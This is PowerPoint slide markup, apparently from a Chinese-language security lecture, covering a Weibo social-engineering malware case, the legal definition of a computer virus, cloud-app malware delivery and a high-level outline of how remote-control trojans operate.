          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1366838" y="3433763"/>
            <a:ext cx="6238875" cy="2847975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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34988" y="2135188"/>
            <a:ext cx="2227262" cy="3722687"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>幸运的是，没有微博名人中招！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）社会工程学</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5124" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3038475" y="1338263"/>
            <a:ext cx="5838825" cy="45815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813" y="1354138"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>2015.12.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>夜间：安天监控预警体系感知到如下线索：某知名作家在新浪微博发布消息，曝光有人以发送“采访提纲”为借口，利用微博私信功能，发送恶意代码链接。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）社会工程学</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3075" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1185863" y="1171576"/>
            <a:ext cx="7003733" cy="526351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3075"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3075"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3075"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="10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813" y="1354138"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）社会工程学</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1157288" y="1181100"/>
            <a:ext cx="7191375" cy="5505450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2828925"/>
            <a:ext cx="8172450" cy="2933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p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4098"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4098"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4098"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                  <p:subTnLst>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn dur="1" fill="hold" display="0" masterRel="nextClick" afterEffect="1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4098"/>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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="1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58813" y="1354138"/>
            <a:ext cx="3398837" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>无论是原始微博截图中的头像、微博两条搜索结果显示的图像，还是百度网盘的头像，相似度都非常高，让人真假难辨。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）社会工程学</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5123" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3876675" y="1009650"/>
            <a:ext cx="5267325" cy="5372100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>社会工程学</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61446" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703263" y="1430338"/>
            <a:ext cx="7704137" cy="4618037"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1300163" y="371475"/>
            <a:ext cx="7000875" cy="6105525"/>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A383737-8399-4A84-B828-34EA14736A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1551481"/>
            <a:ext cx="7772400" cy="4549515"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中华人民共和国计算机信息系统安全保护条例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>》(1994.2.18)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的第二十八条：“计算机病毒，是指编制或者在计算机程序中插入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>破坏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机功能或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>毁坏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据，影响计算机使用，并能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自我复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的一组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>计算机指令或者程序代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE2916C8-EEC6-4C0D-A2D7-9D93A22357BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11454917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标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）社会工程学</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="523875" y="1319213"/>
            <a:ext cx="3981450" cy="4581525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6147" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4886325" y="1524000"/>
            <a:ext cx="3638550" cy="4305300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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6F90969-2D7C-4C32-8E7E-ACD31F98DD76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F7FCD34-FD08-48BF-9B36-E144500AA853}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过云应用投放恶意代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16878A47-921B-4B9F-9E83-889B768DBC61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1195387" y="1402049"/>
            <a:ext cx="6753225" cy="4743450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40388154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3138" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>远程控制木马的运行步骤</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>木马进行网络入侵的过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>配置木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>传播木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>启动木马 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>建立连接 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>远程控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3260341" y="2411413"/>
            <a:ext cx="5683634" cy="3257550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3760836338"/>
      </p:ext>
    </p:extLst>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43139">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1243139">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1243139">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1243139">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3" name="Rectangle 2"/>
